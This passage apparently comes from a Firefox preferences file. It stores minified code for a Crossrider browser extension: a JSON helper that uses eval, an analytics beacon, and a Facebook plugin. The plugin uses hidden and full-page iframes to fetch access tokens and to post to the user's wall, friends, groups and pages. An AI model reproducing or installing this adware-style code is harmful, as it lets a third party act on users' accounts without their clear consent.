cx=/[\\u0000\\u00ad\\u0600-\\u0604\\u070f\\u17b4\\u17b5\\u200c-\\u200f\\u2028-\\u202f\\u2060-\\u206f\\ufeff\\ufff0-\\uffff]/g,escapable=/[\\\\\\\&quot;\\x00-\\x1f\\x7f-\\x9f\\u00ad\\u0600-\\u0604\\u070f\\u17b4\\u17b5\\u200c-\\u200f\\u2028-\\u202f\\u2060-\\u206f\\ufeff\\ufff0-\\uffff]/g,gap,indent,meta={\&quot;\\b\&quot;:\&quot;\\\\b\&quot;,\&quot;\\t\&quot;:\&quot;\\\\t\&quot;,\&quot;\\n\&quot;:\&quot;\\\\n\&quot;,\&quot;\\f\&quot;:\&quot;\\\\f\&quot;,\&quot;\\r\&quot;:\&quot;\\\\r\&quot;,&apos;\&quot;&apos;:&apos;\\\\\&quot;&apos;,\&quot;\\\\\&quot;:\&quot;\\\\\\\\\&quot;},rep;function quote(string){escapable.lastIndex=0;return escapable.test(string)?&apos;\&quot;&apos;+string.replace(escapable,function(a){var c=meta[a];return typeof c===\&quot;string\&quot;?c:\&quot;\\\\u\&quot;+(\&quot;0000\&quot;+a.charCodeAt(0).toString(16)).slice(-4)})+&apos;\&quot;&apos;:&apos;\&quot;&apos;+string+&apos;\&quot;&apos;}function str(key,holder){var i,k,v,length,mind=gap,partial,value=holder[key];if(value&amp;&amp;typeof value===\&quot;object\&quot;&amp;&amp;typeof value.to_CR_JSON===\&quot;function\&quot;){value=value.to_CR_JSON(key)}if(typeof rep===\&quot;function\&quot;){value=rep.call(holder,key,value)}switch(typeof value){case\&quot;string\&quot;:return quote(value);case\&quot;number\&quot;:return isFinite(value)?String(value):\&quot;null\&quot;;case\&quot;boolean\&quot;:case\&quot;null\&quot;:return String(value);case\&quot;object\&quot;:if(!value){return\&quot;null\&quot;}gap+=indent;partial=[];if(Object.prototype.toString.apply(value)===\&quot;[object Array]\&quot;){length=value.length;for(i=0;i&lt;length;i+=1){partial[i]=str(i,value)||\&quot;null\&quot;}v=partial.length===0?\&quot;[]\&quot;:gap?\&quot;[\\n\&quot;+gap+partial.join(\&quot;,\\n\&quot;+gap)+\&quot;\\n\&quot;+mind+\&quot;]\&quot;:\&quot;[\&quot;+partial.join(\&quot;,\&quot;)+\&quot;]\&quot;;gap=mind;return v}if(rep&amp;&amp;typeof rep===\&quot;object\&quot;){length=rep.length;for(i=0;i&lt;length;i+=1){k=rep[i];if(typeof k===\&quot;string\&quot;){v=str(k,value);if(v){partial.push(quote(k)+(gap?\&quot;: \&quot;:\&quot;:\&quot;)+v)}}}}else{for(k in value){if(Object.hasOwnProperty.call(value,k)){v=str(k,value);if(v){partial.push(quote(k)+(gap?\&quot;: \&quot;:\&quot;:\&quot;)+v)}}}}v=partial.length===0?\&quot;{}\&quot;:gap?\&quot;{\\n\&quot;+gap+partial.join(\&quot;,\\n\&quot;+gap)+\&quot;\\n\&quot;+mind+\&quot;}\&quot;:\&quot;{\&quot;+partial.join(\&quot;,\&quot;)+\&quot;}\&quot;;gap=mind;return v}}if(typeof appAPI.JSON.stringify!==\&quot;function\&quot;){appAPI.JSON.stringify=function(value,replacer,space){var i;gap=\&quot;\&quot;;indent=\&quot;\&quot;;if(typeof space===\&quot;number\&quot;){for(i=0;i&lt;space;i+=1){indent+=\&quot; \&quot;}}else{if(typeof space===\&quot;string\&quot;){indent=space}}rep=replacer;if(replacer&amp;&amp;typeof replacer!==\&quot;function\&quot;&amp;&amp;(typeof replacer!==\&quot;object\&quot;||typeof replacer.length!==\&quot;number\&quot;)){throw new Error(\&quot;appAPI.JSON.stringify\&quot;)}return str(\&quot;\&quot;,{\&quot;\&quot;:value})}}if(typeof appAPI.JSON.parse!==\&quot;function\&quot;){appAPI.JSON.parse=function(text,reviver){var j;function walk(holder,key){var k,v,value=holder[key];if(value&amp;&amp;typeof value===\&quot;object\&quot;){for(k in value){if(Object.hasOwnProperty.call(value,k)){v=walk(value,k);if(v!==undefined){value[k]=v}else{delete value[k]}}}}return reviver.call(holder,key,value)}text=String(text);cx.lastIndex=0;if(cx.test(text)){text=text.replace(cx,function(a){return\&quot;\\\\u\&quot;+(\&quot;0000\&quot;+a.charCodeAt(0).toString(16)).slice(-4)})}if(/^[\\],:{}\\s]*$/.test(text.replace(/\\\\(?:[\&quot;\\\\\\/bfnrt]|u[0-9a-fA-F]{4})/g,\&quot;@\&quot;).replace(/\&quot;[^\&quot;\\\\\\n\\r]*\&quot;|true|false|null|-?\\d+(?:\\.\\d*)?(?:[eE][+\\-]?\\d+)?/g,\&quot;]\&quot;).replace(/(?:^|:|,)(?:\\s*\\[)+/g,\&quot;\&quot;))){j=eval(\&quot;(\&quot;+text+\&quot;)\&quot;);return typeof reviver===\&quot;function\&quot;?walk({\&quot;\&quot;:j},\&quot;\&quot;):j}throw new SyntaxError(\&quot;appAPI.JSON.parse\&quot;)}}}())}(function(a){a.debug=function(h,f){if(!a.isDebugMode()){return}var b=!a.debug.settings.console;if(f!=null){b=f}try{if(!b){var g=new Date();var i=(((a.debug.settings.timestamp)&amp;&amp;(typeof(h)==\&quot;string\&quot;))?(g.toLocaleTimeString()+\&quot;.\&quot;+g.getMilliseconds()+\&quot;: \&quot;+h):h);console.log(i)}else{alert(h)}}catch(c){alert(h)}};a.debug.settings={console:true,timestamp:true}})(appAPI);(function(a){a.installer={};a.installer.getParams=function(){return(a.db.get(\&quot;InstallerParams\&quot;)||{})};a.installer.getUnixTime=function(){return(a.db.get(\&quot;InstallationTime\&quot;)||null)}})(appAPI);(function(b){b.time={};b.time.secondsFromNow=function(c){return a(c*1000)};b.time.secondsAgo=function(c){return a(c*-1000)};b.time.minutesFromNow=function(c){return a(c*60*1000)};b.time.minutesAgo=function(c){return a(c*60*-1000)};b.time.hoursFromNow=function(c){return a(c*3600*1000)};b.time.hoursAgo=function(c){return a(c*3600*-1000)};b.time.daysFromNow=function(c){return a(c*3600*24*1000)};b.time.daysAgo=function(c){return a(c*3600*24*-1000)};b.time.yearsFromNow=function(c){return a(c*365*3600*24*1000)};b.time.yearsAgo=function(c){return a(c*365*3600*24*-1000)};function a(c){return new Date(new Date().getTime()+c)}})(appAPI);(function(a){a.analytics={};a.analytics.trackUrl=function(b){function c(h,j,e){function o(q,i){return q+Math.floor(Math.random()*(i-q))}var l=1000000000,p=o(l,9999999999),f=o(10000000,99999999),g=o(l,2147483647),n=(new Date()).getTime(),m=window.location,k=new Image(),d=document.location.protocol+\&quot;//www.google-analytics.com/__utm.gif?utmwv=1.3&amp;utmn=\&quot;+p+\&quot;&amp;utmsr=-&amp;utmsc=-&amp;utmul=-&amp;utmje=0&amp;utmfl=-&amp;utmdt=-&amp;utmhn=\&quot;+j+\&quot;&amp;utmr=\&quot;+m+\&quot;&amp;utmp=\&quot;+e+\&quot;&amp;utmac=\&quot;+h+\&quot;&amp;utmcc=__utma%3D\&quot;+f+\&quot;.\&quot;+g+\&quot;.\&quot;+n+\&quot;.\&quot;+n+\&quot;.\&quot;+n+\&quot;.2%3B%2B__utmb%3D\&quot;+f+\&quot;%3B%2B__utmc%3D\&quot;+f+\&quot;%3B%2B__utmz%3D\&quot;+f+\&quot;.\&quot;+n+\&quot;.2.2.utmccn%3D(referral)%7Cutmcsr%3D\&quot;+m.host+\&quot;%7Cutmcct%3D\&quot;+m.pathname+\&quot;%7Cutmcmd%3Dreferral%3B%2B__utmv%3D\&quot;+f+\&quot;.-%3B\&quot;;k.src=d}if((this.settings.account==\&quot;\&quot;)||(this.settings.domain==\&quot;\&quot;)){a.debug(\&quot;Error: In order to use the analytics API you must first specify your domain and account ID from Google Analytics!\\nThis can easily done by setting appAPI.setting.account and appAPI.setting.domain\&quot;);return}c(this.settings.account,this.settings.domain,b)};a.analytics.trackEvent=function(c,e,b,d){function f(m,o,h,k,n,u,v){function t(x,i){return x+Math.floor(Math.random()*(i-x))}var q=1000000000,w=t(q,9999999999),j=t(10000000,99999999),l=t(q,2147483647),s=(new Date()).getTime(),r=window.location,p=new Image(),g=document.location.protocol+\&quot;//www.google-analytics.com/__utm.gif?utmwv=4.8.9&amp;utmn=\&quot;+w+\&quot;&amp;utmsr=-&amp;utmsc=-&amp;utmul=-&amp;utmje=0&amp;utmfl=-&amp;utmdt=-&amp;utmhn=\&quot;+o+\&quot;&amp;utmr=-&amp;utmt=event&amp;utme=5(\&quot;+k+\&quot;*\&quot;+n+\&quot;*\&quot;+u+\&quot;)(\&quot;+v+\&quot;)&amp;utmp=\&quot;+h+\&quot;&amp;utmac=\&quot;+m+\&quot;&amp;utmcc=__utma%3D\&quot;+j+\&quot;.\&quot;+l+\&quot;.\&quot;+s+\&quot;.\&quot;+s+\&quot;.\&quot;+s+\&quot;.2%3B%2B__utmb%3D\&quot;+j+\&quot;%3B%2B__utmc%3D\&quot;+j+\&quot;%3B%2B__utmz%3D\&quot;+j+\&quot;.\&quot;+s+\&quot;.2.2.utmccn%3D(referral)%7Cutmcsr%3D\&quot;+r.host+\&quot;%7Cutmcct%3D\&quot;+r.pathname+\&quot;%7Cutmcmd%3Dreferral%3B%2B__utmv%3D\&quot;+j+\&quot;.-%3B\&quot;;p.src=g}if(typeof(c)!=\&quot;string\&quot;){c=\&quot;\&quot;}if(typeof(e)!=\&quot;string\&quot;){e=\&quot;\&quot;}if(typeof(b)!=\&quot;string\&quot;){b=\&quot;\&quot;}if(typeof(d)!=\&quot;number\&quot;){d=0}if((c==\&quot;\&quot;)&amp;&amp;(e==\&quot;\&quot;)&amp;&amp;(b==\&quot;\&quot;)&amp;&amp;(d==0)){a.debug(\&quot;Error: In order to use trackEvent you must specify the event parameters!\&quot;);return}if((this.settings.account==\&quot;\&quot;)||(this.settings.domain==\&quot;\&quot;)){a.debug(\&quot;Error: In order to use the analytics API you must first specify your domain and account ID from Google Analytics!\\nThis can easily done by setting appAPI.setting.account and appAPI.setting.domain\&quot;);return}f(this.settings.account,this.settings.domain,document.location.href,c,e,b,d)};a.analytics.settings={account:\&quot;\&quot;,domain:\&quot;\&quot;}})(appAPI);&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_14.name&quot;, &quot;CrossriderUtils&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_14.ver&quot;, 2);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_15.code&quot;, &quot;(function(f){var u={};var e=Math.floor(Math.random()*99999);var g=Math.floor(Math.random()*99999999999999)+\&quot;Z\&quot;+(new Date()).getTime();var a=\&quot;\&quot;;var c=\&quot;\&quot;;if(f.platform==\&quot;FF\&quot;||f.platform==\&quot;CH\&quot;){e=\&quot;\&quot;}function t(w,x){for(css_prop in x){if(x.hasOwnProperty(css_prop)){w.style[css_prop]=x[css_prop]}}}function p(z,w){z+=f.appInfo.id+a+e;var y=document.getElementById(z);if(y){y.parentNode.removeChild(y)}y=document.createElement(\&quot;iframe\&quot;);y.setAttribute(\&quot;id\&quot;,z);y.setAttribute(\&quot;name\&quot;,z);y.setAttribute(\&quot;type\&quot;,\&quot;content\&quot;);y.setAttribute(\&quot;allowtransparency\&quot;,\&quot;true\&quot;);y.setAttribute(\&quot;frameborder\&quot;,\&quot;0\&quot;);y.frameBorder=\&quot;0\&quot;;y.allowtransparency=\&quot;true\&quot;;var x=function(A){if(A.target){A.target.style.visibility=\&quot;visible\&quot;}else{if(A.srcElement){A.srcElement.style.visibility=\&quot;visible\&quot;}}};if(\&quot;addEventListener\&quot; in y){y.addEventListener(\&quot;load\&quot;,x,false)}else{if(\&quot;attachEvent\&quot; in y){y.attachEvent(\&quot;onload\&quot;,x)}}y.src=w;y.allowTransparency=\&quot;true\&quot;;y.setAttribute(\&quot;style\&quot;,\&quot;position:absolute !important; top:0 !important;left:0 !important; border:0 !important; width:99% !important; height:130% !important; z-index:99999 !important;\&quot;);t(y,{position:\&quot;absolute\&quot;,top:\&quot;0\&quot;,left:\&quot;0\&quot;,position:\&quot;absolute\&quot;,border:\&quot;0\&quot;,position:\&quot;absolute\&quot;,width:\&quot;100%\&quot;,height:\&quot;100%\&quot;,zIndex:\&quot;9999999\&quot;,visibility:\&quot;hidden\&quot;});(document.documentElement||document.body).appendChild(y);if(y.contentDocument){y.contentDocument.location.href=w}}function v(y,w){y+=f.appInfo.id+a+e;var x=document.getElementById(y);if(x){x.parentNode.removeChild(x)}x=document.createElement(\&quot;iframe\&quot;);x.setAttribute(\&quot;id\&quot;,y);x.setAttribute(\&quot;name\&quot;,y);x.setAttribute(\&quot;type\&quot;,\&quot;content\&quot;);x.setAttribute(\&quot;collapsed\&quot;,\&quot;true\&quot;);x.style.width=0;x.style.height=0;x.style.border=0;x.src=w;(document.documentElement||document.body).appendChild(x);if(x.contentDocument){x.contentDocument.location.href=w}}function b(y){y+=f.appInfo.id+a+e;var x=document.getElementById(y),w=(x.parentNode||document.body);if(x){w.removeChild(x)}}function o(){var w=0;if(\&quot;getTabId\&quot; in f){w=f.getTabId()}else{if(\&quot;getTabID\&quot; in FFInternal){w=FFInternal.getTabID(document,g)}}return\&quot;tid=\&quot;+w}function i(w){if(f.platform==\&quot;FF\&quot;){var x=document.getElementById(w+f.appID+a);if(x){x.parentNode.removeChild(x)}}}function k(){window.addEventListener(\&quot;message\&quot;,function(B){var y=B.origin,A=B.data;if(y.indexOf(\&quot;app\&quot;+f.appInfo.id+\&quot;.crossrider.com\&quot;)&gt;=0){var D=f.getTabId();if(D==A.tabId){var z={close_invite_window:\&quot;CrossRiderAPI__SocialCloseEventIframe\&quot;,connect:\&quot;CrossRiderAPI__FacebookConnectRequest\&quot;,is_connected:\&quot;CrossRiderAPI__FacebookIsConnectedRequest\&quot;,post_to_wall:\&quot;CrossRiderAPI__FacebookPostToWallRequest\&quot;,get_friends:\&quot;CrossRiderAPI__FacebookGetFriendsRequest\&quot;,get_info:\&quot;CrossRiderAPI__FacebookGetInfoRequest\&quot;,update_status:\&quot;CrossRiderAPI__FacebookUpdateStatusRequest\&quot;,logout:\&quot;CrossRiderAPI__FacebookLogoutRequest\&quot;,get_groups:\&quot;CrossRiderAPI__FacebookGetGroupsRequest\&quot;,get_pages:\&quot;CrossRiderAPI__FacebookGetPagesRequest\&quot;,post_to_groups:\&quot;CrossRiderAPI__FacebookPostToGroupsRequest\&quot;,post_to_pages:\&quot;CrossRiderAPI__FacebookPostToPagesRequest\&quot;,post_to_friends:\&quot;CrossRiderAPI__FacebookPostToFriendsRequest\&quot;,ui_share:\&quot;CrossRiderAPI__FacebookFbShareRequest\&quot;,ui_publish:\&quot;CrossRiderAPI__FacebookFbPublishRequest\&quot;};if(z.hasOwnProperty(A.action)){var x=A.response[0],C=A.response[1],w=z[A.action];i(w);m(C,x,w)}}}},false)}function d(){var w=[\&quot;CrossRiderAPI__SocialCloseEventIframe\&quot;,\&quot;CrossRiderAPI__FacebookConnectRequest\&quot;,\&quot;CrossRiderAPI__FacebookIsConnectedRequest\&quot;,\&quot;CrossRiderAPI__FacebookPostToWallRequest\&quot;,\&quot;CrossRiderAPI__FacebookGetFriendsRequest\&quot;,\&quot;CrossRiderAPI__FacebookGetInfoRequest\&quot;,\&quot;CrossRiderAPI__FacebookUpdateStatusRequest\&quot;,\&quot;CrossRiderAPI__FacebookLogoutRequest\&quot;,\&quot;CrossRiderAPI__FacebookGetGroupsRequest\&quot;,\&quot;CrossRiderAPI__FacebookGetPagesRequest\&quot;,\&quot;CrossRiderAPI__FacebookPostToFriendsRequest\&quot;,\&quot;CrossRiderAPI__FacebookFbShareRequest\&quot;,\&quot;CrossRiderAPI__FacebookFbPublishRequest\&quot;,\&quot;CrossRiderAPI__FacebookPostToGroupsRequest\&quot;,\&quot;CrossRiderAPI__FacebookPostToPagesRequest\&quot;];var y=function(A){var C=\&quot;\&quot;;if(B==\&quot;null\&quot;){B=null}if(A.type.indexOf(f.appID+a)&gt;=0){C=A.type.replace(f.appID+a,\&quot;\&quot;);if(w.indexOf(C)&gt;=0){var D=A.target.getAttribute(\&quot;desc\&quot;),B=A.target.getAttribute(\&quot;response\&quot;);B=f.JSON.stringify({_cr_fb:B});B=l(B);B=B._cr_fb;if(B.hasOwnProperty(\&quot;data\&quot;)){B=B.data}i(C);m(D,B,C)}}};for(var z=0,x=w.length;z&lt;x;++z){window.addEventListener(w[z]+f.appID+a,y,false)}}function h(){switch(f.platform){case\&quot;CH\&quot;:k();break;case\&quot;FF\&quot;:d();break;default:break}}function n(x){var w={invite:\&quot;crossrider--invite-iframe\&quot;,connect:\&quot;crossrider--connect-iframe\&quot;,isConnected:\&quot;crossrider--is_connected-iframe\&quot;,postToWall:\&quot;crossrider--post_to_wall-iframe\&quot;,getFriends:\&quot;crossrider--get_friends-iframe\&quot;,getInfo:\&quot;crossrider--get_info-iframe\&quot;,updateStatus:\&quot;crossrider--update_status-iframe\&quot;,logout:\&quot;crossrider--logout-iframe\&quot;,getGroups:\&quot;crossrider--get_groups-iframe\&quot;,getPages:\&quot;crossrider--get_pages-iframe\&quot;,postToGroups:\&quot;crossrider--post_to_groups-iframe\&quot;,postToPages:\&quot;crossrider--post_to_pages-iframe\&quot;,postToFriends:\&quot;crossrider--post_to_friends-iframe\&quot;,fbShare:\&quot;crossrider--ui_share-iframe\&quot;,fbPublish:\&quot;crossrider--ui_publish-iframe\&quot;};return w[x]}function l(w){return f.JSON.parse(w)}function r(z,B,D,A){u=this;var x=0;if((B)&amp;&amp;(B!=0)){x=B}else{x=z}var w=false;var E;if((!D)||(D==\&quot;\&quot;)||(D==\&quot;NA\&quot;)){w=true;E=\&quot;hxxp://app\&quot;+x+\&quot;.crossrider.com/fb\&quot;}else{w=false;E=D+(D.indexOf(\&quot;?\&quot;)===-1?\&quot;?\&quot;:\&quot;&amp;\&quot;)+\&quot;aid=\&quot;+x;if(f.platform==\&quot;FF\&quot;){D+=\&quot;?appid=\&quot;+f.appID+c}if(f.platform==\&quot;CH\&quot;){D+=\&quot;?appid=\&quot;+f.appID}}if(typeof(A)!==\&quot;undefiend\&quot;){c=\&quot;\&quot;;a=\&quot;\&quot;;if(A!=null){c=\&quot;&amp;worker=W\&quot;+A;a=\&quot;W\&quot;+A}}if(f.platform==\&quot;FF\&quot;||f.platform==\&quot;CH\&quot;){h()}this.connectCallbackFunction=null;this.inviteCallbackFunction=null;this.isConnectedCallbackFunction=null;this.postToWallCallbackFunction=null;this.getFriendsCallbackFunction=null;this.getInfoCallbackFunction=null;this.updateStatusCallbackFunction=null;this.logoutCallbackFunction=null;this.getGroupsCallbackFunction=null;this.getPagesCallbackFunction=null;this.postToGroupsCallbackFunction=null;this.postToPagesCallbackFunction=null;this.postToFriendsCallbackFunction=null;this.fbShareCallbackFunction=null;this.fbPublishCallbackFunction=null;this.hash_to_params=function(G){params=\&quot;\&quot;;for(var F in G){param=F+\&quot;=\&quot;+escape(G[F]);params+=\&quot;&amp;\&quot;+param}return params};function y(G,H){if(w){var F=E+\&quot;/\&quot;+G+\&quot;?appid=\&quot;+f.appInfo.id;if(f.platform==\&quot;FF\&quot;||f.platform==\&quot;CH\&quot;){F+=\&quot;&amp;\&quot;+o()+c+H}if(f.platform==\&quot;IE\&quot;){F+=H+\&quot;&amp;objid=\&quot;+e}return F}else{var F=E;if(f.platform==\&quot;IE\&quot;){F+=\&quot;&amp;appid=\&quot;+f.appInfo.id+\&quot;&amp;api=\&quot;+G+H+\&quot;&amp;objid=\&quot;+e}if(f.platform==\&quot;FF\&quot;||f.platform==\&quot;CH\&quot;){F+=\&quot;&amp;api=\&quot;+G+\&quot;&amp;\&quot;+o()+H}return F}}function C(){var F=/^(https?\\:\\/\\/(www|ssl)\\.facebook\\.com\\/login\\.php|https?\\:\\/\\/www\\.facebook\\.com\\/connect\\/uiserver\\.php|https?\\:\\/\\/static\\.ak\\.fbcdn\\.net\\/connect\\/xd_proxy\\.php|https?\\:\\/\\/.*?fbcdn.net\\/connect\\/xd_proxy\\.php|https?\\:\\/\\/www\\.facebook\\.com\\/dialog\\/permissions\\.request|https?\\:\\/\\/www\\.facebook\\.com\\/dialog\\/oauth).*/;if(document.location.href.match(F)){return true}return false}this.invite=function(I,G){if(C()){return}this.inviteCallbackFunction=G;var H=this.hash_to_params(I);var F=y(\&quot;invite\&quot;,H);p(n(\&quot;invite\&quot;),F)};this.connect=function(G){if(C()){return}this.connectCallbackFunction=G;var F=y(\&quot;connect\&quot;,\&quot;\&quot;);if(F.indexOf(\&quot;?\&quot;)&gt;=0){F+=\&quot;&amp;get_access_token=true\&quot;}else{F+=\&quot;?get_access_token=true\&quot;}v(n(\&quot;connect\&quot;),F)};this.isConnected=function(G){if(C()){return}this.isConnectedCallbackFunction=G;var F=y(\&quot;is_connected\&quot;,\&quot;\&quot;);v(n(\&quot;isConnected\&quot;),F)};this.postToWall=function(I,G){if(C()){return}this.postToWallCallbackFunction=G;var H=this.hash_to_params(I);var F=y(\&quot;post_to_wall\&quot;,H);v(n(\&quot;postToWall\&quot;),F)};this.getFriends=function(G){if(C()){return}this.getFriendsCallbackFunction=G;var F=y(\&quot;get_friends\&quot;,\&quot;\&quot;);v(n(\&quot;getFriends\&quot;),F)};this.getInfo=function(I,G){if(C()){return}this.getInfoCallbackFunction=G;var H=\&quot;&amp;id=\&quot;+escape(I);var F=y(\&quot;get_info\&quot;,H);v(n(\&quot;getInfo\&quot;),F)};this.getMyInfo=function(F){if(C()){return}this.getInfo(\&quot;me\&quot;,F)};this.updateStatus=function(H,G){if(C()){return}this.updateStatusCallbackFunction=G;var I=\&quot;&amp;message=\&quot;+escape(H);var F=y(\&quot;update_status\&quot;,I);v(n(\&quot;updateStatus\&quot;),F)};this.logout=function(G){if(C()){return}this.logoutCallbackFunction=G;var F=y(\&quot;logout\&quot;,\&quot;\&quot;);v(n(\&quot;logout\&quot;),F)};this.getGroups=function(G){if(C()){return}this.getGroupsCallbackFunction=G;var F=y(\&quot;get_groups\&quot;,\&quot;\&quot;);v(n(\&quot;getGroups\&quot;),F)};this.getPages=function(G){if(C()){return}this.getPagesCallbackFunction=G;var F=y(\&quot;get_pages\&quot;,\&quot;\&quot;);v(n(\&quot;getPages\&quot;),F)};this.postToGroups=function(I,K,G){if(C()){return}this.postToGroupsCallbackFunction=G;var H=I.join(\&quot;,\&quot;);var J=this.hash_to_params(K);J=\&quot;&amp;ids=\&quot;+H+J;var F=y(\&quot;post_to_groups\&quot;,J);v(n(\&quot;postToGroups\&quot;),F)};this.postToGroup=function(G,H,F){if(C()){return}this.postToGroups([G],H,F)};this.postToPages=function(F,K,H){if(C()){return}this.postToPagesCallbackFunction=H;var I=F.join(\&quot;,\&quot;);var J=this.hash_to_params(K);J=\&quot;&amp;ids=\&quot;+I+J;var G=y(\&quot;post_to_pages\&quot;,J);v(n(\&quot;postToPages\&quot;),G)};this.postToPage=function(F,H,G){if(C()){return}this.postToPages([F],H,G)};this.postToFriends=function(H,K,G){if(C()){return}this.postToFriendsCallbackFunction=G;var I=H.join(\&quot;,\&quot;);var J=this.hash_to_params(K);J=\&quot;&amp;ids=\&quot;+I+J;var F=y(\&quot;post_to_friends\&quot;,J);v(n(\&quot;postToFriends\&quot;),F)};this.postToFriend=function(G,H,F){if(C()){return}this.postToFriends([G],H,F)};this.fbShare=function(H,G){if(C()){return}this.fbShareCallbackFunction=G;var I=\&quot;&amp;url=\&quot;+escape(H);var F=y(\&quot;ui_share\&quot;,I);p(n(\&quot;fbShare\&quot;),F)};this.fbPublish=function(I,G){if(C()){return}this.fbPublishCallbackFunction=G;var H=this.hash_to_params(I);var F=y(\&quot;ui_publish\&quot;,H);p(n(\&quot;fbPublish\&quot;),F)}}function m(C,y,w,A){function z(G){if(G==null){return null}return(G==\&quot;1\&quot;||G==\&quot;true\&quot;)}function B(G){if(G==null){return null}return parseInt(G)}if((A!=e)&amp;&amp;(f.platform==\&quot;IE\&quot;)){return}if(w==\&quot;CrossRiderAPI__SocialCloseEventIframe\&quot;){b(\&quot;crossrider--invite-iframe\&quot;);if(u.inviteCallbackFunction){u.inviteCallbackFunction(B(y),C)}return}if(w==\&quot;CrossRiderAPI__FacebookConnectRequest\&quot;){b(\&quot;crossrider--connect-iframe\&quot;);if(u.connectCallbackFunction){var x=null,F=null,D=null;if(y!=null){var E=l(y);if(typeof(E.data)==\&quot;string\&quot;){x=l(E.data)}if(typeof(E.data)==\&quot;object\&quot;){x=E.data}if(E.hasOwnProperty(\&quot;response\&quot;)){F=E.response}if(E.hasOwnProperty(\&quot;accessToken\&quot;)){D=E.accessToken}}u.connectCallbackFunction(F,C,D)}}if(w==\&quot;CrossRiderAPI__FacebookIsConnectedRequest\&quot;){b(\&quot;crossrider--is_connected-iframe\&quot;);if(u.isConnectedCallbackFunction){u.isConnectedCallbackFunction(z(y),C)}}if(w==\&quot;CrossRiderAPI__FacebookPostToWallRequest\&quot;){b(\&quot;crossrider--post_to_wall-iframe\&quot;);if(u.postToWallCallbackFunction){u.postToWallCallbackFunction(z(y),C)}}if(w==\&quot;CrossRiderAPI__FacebookGetFriendsRequest\&quot;){b(\&quot;crossrider--get_friends-iframe\&quot;);if(u.getFriendsCallbackFunction){var x=null;if(y!=null){var E=l(y);if(typeof(E.data)==\&quot;string\&quot;){x=l(E.data)}if(typeof(E.data)==\&quot;object\&quot;){x=E.data}}u.getFriendsCallbackFunction(x,C)}}if(w==\&quot;CrossRiderAPI__FacebookGetInfoRequest\&quot;){b(\&quot;crossrider--get_info-iframe\&quot;);if(u.getInfoCallbackFunction){var E=(y==null?null:l(y));u.getInfoCallbackFunction(E,C)}}if(w==\&quot;CrossRiderAPI__FacebookUpdateStatusRequest\&quot;){b(\&quot;crossrider--update_status-iframe\&quot;);if(u.updateStatusCallbackFunction){u.updateStatusCallbackFunction(z(y),C)}}if(w==\&quot;CrossRiderAPI__FacebookLogoutRequest\&quot;){b(\&quot;crossrider--logout-iframe\&quot;);if(u.logoutCallbackFunction){u.logoutCallbackFunction(z(y),C)}}if(w==\&quot;CrossRiderAPI__FacebookGetGroupsRequest\&quot;){b(\&quot;crossrider--get_groups-iframe\&quot;);if(u.getGroupsCallbackFunction){var x=null;if(y!=null){var E=l(y);if(typeof(E.data)==\&quot;string\&quot;){x=l(E.data)}if(typeof(E.data)==\&quot;object\&quot;){x=E.data}}u.getGroupsCallbackFunction(x,C)}}if(w==\&quot;CrossRiderAPI__FacebookGetPagesRequest\&quot;){b(\&quot;crossrider--get_pages-iframe\&quot;);if(u.getPagesCallbackFunction){var x=null;if(y!=null){var E=l(y);if(typeof(E.data)==\&quot;string\&quot;){x=l(E.data)}if(typeof(E.data)==\&quot;object\&quot;){x=E.data}}u.getPagesCallbackFunction(x,C)}}if(w==\&quot;CrossRiderAPI__FacebookPostToGroupsRequest\&quot;){b(\&quot;crossrider--post_to_groups-iframe\&quot;);if(u.postToGroupsCallbackFunction){u.postToGroupsCallbackFunction(B(y),C)}}if(w==\&quot;CrossRiderAPI__FacebookPostToPagesRequest\&quot;){b(\&quot;crossrider--post_to_pages-iframe\&quot;);if(u.postToPagesCallbackFunction){u.postToPagesCallbackFunction(B(y),C)}}if(w==\&quot;CrossRiderAPI__FacebookPostToFriendsRequest\&quot;){b(\&quot;crossrider--post_to_friends-iframe\&quot;);if(u.postToFriendsCallbackFunction){u.postToFriendsCallbackFunction(B(y),C)}}if(w==\&quot;CrossRiderAPI__FacebookFbShareRequest\&quot;){b(\&quot;crossrider--ui_share-iframe\&quot;);if(u.fbShareCallbackFunction){u.fbShareCallbackFunction(z(y),C)}}if(w==\&quot;CrossRiderAPI__FacebookFbPublishRequest\&quot;){b(\&quot;crossrider--ui_publish-iframe\&quot;);if(u.fbPublishCallbackFunction){u.fbPublishCallbackFunction(z(y),C)}}}var s=f.appInfo.id,j=f.internal.manifest.groupId,q=f.internal.manifest.remoteFbApiUrl;f.fbAPI=new r(s,j,q);f.internal.fbCb=m})(appAPI);var __CR_FB_CB_FUNC__=appAPI.internal.fbCb;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_15.name&quot;, &quot;FacebookFFIE&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_15.ver&quot;, 1);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_16.code&quot;, &quot;if((typeof isBackground===\&quot;undefined\&quot;||isBackground!=true)&amp;&amp;(typeof _firefoxVersion!==\&quot;undefined\&quot;&amp;&amp;_firefoxVersion&gt;14)&amp;&amp;typeof sharedObject!==\&quot;undefined\&quot;){UserReport=sharedObject.wrappedUserReport?sharedObject.wrappedUserReport:UserReport;alert=sharedObject.wrappedAlert?sharedObject.wrappedAlert:alert;console=sharedObject.wrappedConsole?sharedObject.wrappedConsole:console;FFInternal=sharedObject.wrappedFFInternal?sharedObject.wrappedFFInternal:FFInternal}(function(){var j=(typeof __NewXPI__!==\&quot;undefined\&quot;&amp;&amp;__NewXPI__==true);function f(e){this._MessageObject=e}(function(l){function e(){return(FFInternal.platformVersion&gt;80)}function m(){var o;if(document.defaultView.top==document.defaultView){o=FFInternal.getTabID(document)}else{if(window&amp;&amp;window._CR_tabId){o=window._CR_tabId}else{o=FFInternal.getTabID(document,document.location.href,true)}}return o}function n(r){var p=\&quot;appAPI.message.addListener UserCallback\&quot;;var q=(typeof r===\&quot;function\&quot;&amp;&amp;typeof r.name===\&quot;string\&quot;&amp;&amp;r.name.length&gt;0)?r.name:p;var o=UserReport.surroundCallbackWithTryCatch(r,q);if(!j){return o}_newCallback=function(){var s=o;try{arguments[0]=appAPI.JSON.parse(arguments[0])}catch(t){}return s(arguments[0])};return _newCallback}l.addListener=function(o){var 